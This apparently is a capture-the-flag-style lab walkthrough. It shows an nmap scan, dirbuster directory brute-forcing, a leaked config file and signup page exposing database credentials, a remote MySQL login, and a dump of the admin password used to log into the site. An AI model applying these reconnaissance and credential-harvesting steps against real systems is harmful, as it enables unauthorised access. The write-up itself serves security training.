Lets see how to brute-force directories using the dirbuster and dirb tools.
Description
You are a Penetration Tester hired by the company AwdMgmt to perform security tests on their internal Web Application and machines. You are asked to perform the penetration test on the client premises. During this engagement you are not given a well-defined scope. You are sitting in the client corporate building, directly attached to the client network.
Goal
The goal of this lab is to first find the web servers in the network you are directly attached. Then to test the Web Application running on it in order to check if you can access restricted areas (such as the login page)!
Tools
The best tools for this lab are:
Dirbuster
mysql
Web browser
Steps
Find all the machines in the network
Since we do not have any information about the network and related hosts, the first step is to find all alive hosts in the network.
Identify the machines role
Now that we know there is a host on the target network, let us scan it and gather as much information as we can about it. We are interested in web servers.
Explore the web application
Once we have found a web server explore the Web Application from a web browser and analyze it.
Remember that the goal of our tests is to access the restricted web area.
Find hidden files
Now that you have an idea of how the Web Application works, run dirbuster and check if there is any file that may be useful to access the login page!
Test the credentials found
You should have found two interesting files. Use the information stored in these two files to access the DMBS.
Retrieve the correct admin password
Now that you have access to the database, dump the administrator credentials and try to log into the Web Application.
Solutions
We are now connected to the enterprise network AwdMgmt.
10.104.11.50/24 this is our ip address connected via tap0 interface.
now lets discover the ports running on the 96 and 198. For this lets use the nmap.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV 10.104.11.96,198 -vv
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-21 08:05 EDT
NSE: Loaded 45 scripts for scanning.
Initiating ARP Ping Scan at 08:05
Scanning 2 hosts [1 port/host]
Completed ARP Ping Scan at 08:05, 0.39s elapsed (2 total hosts)
Initiating Parallel DNS resolution of 2 hosts. at 08:05
Completed Parallel DNS resolution of 2 hosts. at 08:05, 5.56s elapsed
Initiating SYN Stealth Scan at 08:05
Scanning 2 hosts [1000 ports/host]
Discovered open port 80/tcp on 10.104.11.96
Discovered open port 22/tcp on 10.104.11.198
Discovered open port 22/tcp on 10.104.11.96
Discovered open port 3306/tcp on 10.104.11.198
Completed SYN Stealth Scan against 10.104.11.96 in 23.00s (1 host left)
Completed SYN Stealth Scan at 08:05, 23.95s elapsed (2000 total ports)
Initiating Service scan at 08:05
Scanning 4 services on 2 hosts
Completed Service scan at 08:05, 6.69s elapsed (4 services on 2 hosts)
NSE: Script scanning 2 hosts.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:05
Completed NSE at 08:05, 1.41s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:05
Completed NSE at 08:05, 1.33s elapsed
Nmap scan report for 10.104.11.96
Host is up, received arp-response (0.33s latency).
Scanned at 2021-08-21 08:05:10 EDT for 40s
Not shown: 998 closed ports
Reason: 998 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.22 ((Debian))
MAC Address: 00:50:56:A5:41:5F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.104.11.198
Host is up, received arp-response (0.33s latency).
Scanned at 2021-08-21 08:05:10 EDT for 39s
Not shown: 998 closed ports
Reason: 998 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
3306/tcp open mysql syn-ack ttl 64 MySQL 5.5.38-0+wheezy1
MAC Address: 00:50:56:A5:41:5F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 41.43 seconds
Raw packets sent: 2063 (90.740KB) | Rcvd: 2559 (182.859KB)
┌──(kali㉿kali)-[~]
└─$
based on the results we now know that a http service is running on the ip 10.104.11.96. So, lets visit the ip and check if any site is running on it.
site awdmgmt on homepage
now that we have the site ,lets enumerate the directories by using DIRBUSTER.
Dirbuster is a tool which uses wordlist to check the possible directories present in the website. Alternatives for the Dirbuster is dirb, ffuzz etc.
lets proceed with the dirbuster tool
Enter the url.
Select the number of threads.
Select the wordlist file, i have used directory-list-2.3-medium.txt
Specify the extentions to search for
and run the dirbuster.
selectingthe
now we have some of the directories in the site
after looking at the staff directory we find a note in this path
http://10.104.11.96/staff/readme.txt which shows the following
now after closely looking at the other search results we found a old config file.
however after checking the old config file, the username and password were wrong/expired.
then we found the page http://10.104.11.96/signup.php where the real credentials were present so we used that creds and connected the db that was present in 10.104.11.198 to website ip.
┌──(kali㉿kali)-[~/Downloads]
└─$ cat config\(1\).old
<?php
$dbhostname='127.0.0.1';
$dbuser='awd';
$dbpassword='UcuicjsQgG0FILdjdL8D';
$dbname='awd';
$connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname) or die("Unable to connect to MySQL");
/*
$pages = array (
'index.php?a=announce.txt' => 'Home',
'news.php' => 'News',
'pubs.php' => 'Publications',
'#' => 'Sing up'
);
*/
$pages = array (
'index.php' => 'Home',
'news.php' => 'News',
'awards.php' => 'Awards',
'offline.php' => 'Sing up'
);
?>
┌──(kali㉿kali)-[~/Downloads]
└─$ mysql -h 10.104.11.198 -u awd -p UcuicjsQgG0FILdjdL8D
Enter password:
ERROR 1045 (28000): Access denied for user 'awd'@'10.104.11.50' (using password: YES)
┌──(kali㉿kali)-[~/Downloads]
└─$ 1 ⨯
┌──(kali㉿kali)-[~/Downloads]
└─$ mysql -h 10.104.11.198 -u awdmgmt 1 ⨯
ERROR 1045 (28000): Access denied for user 'awdmgmt'@'10.104.11.50' (using password: NO)
┌──(kali㉿kali)-[~/Downloads]
└─$ mysql -h 10.104.11.198 -u awdmgmt -p 1 ⨯
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 272
Server version: 5.5.38-0+wheezy1 (Debian)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
MySQL [(none)]>
now lets login and check the mysql database for the password.
┌──(kali㉿kali)-[~/Downloads]
└─$ mysql -h 10.104.11.198 -u awdmgmt -p 1 ⨯
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 465
Server version: 5.5.38-0+wheezy1 (Debian)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> use awdmgmt_accounts
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [awdmgmt_accounts]> show tables;
+----------------------------+
| Tables_in_awdmgmt_accounts |
+----------------------------+
| accounts |
+----------------------------+
1 row in set (0.340 sec)
MySQL [awdmgmt_accounts]> select * from accounts;
+----+--------------------+----------+-------------+
| id | email | password | displayname |
+----+--------------------+----------+-------------+
| 1 | admin@awdmgmt.labs | ENS7VvW8 | Admin |
+----+--------------------+----------+-------------+
1 row in set (0.336 sec)
MySQL [awdmgmt_accounts]> Ctrl-C -- exit!
Aborted
┌──(kali㉿kali)-[~/Downloads]
└─$
we got the admin credentials, so lets go ahead and try them on the site!
Successfully logged in as admin.
That's it for today see ya , until next time bye!!!
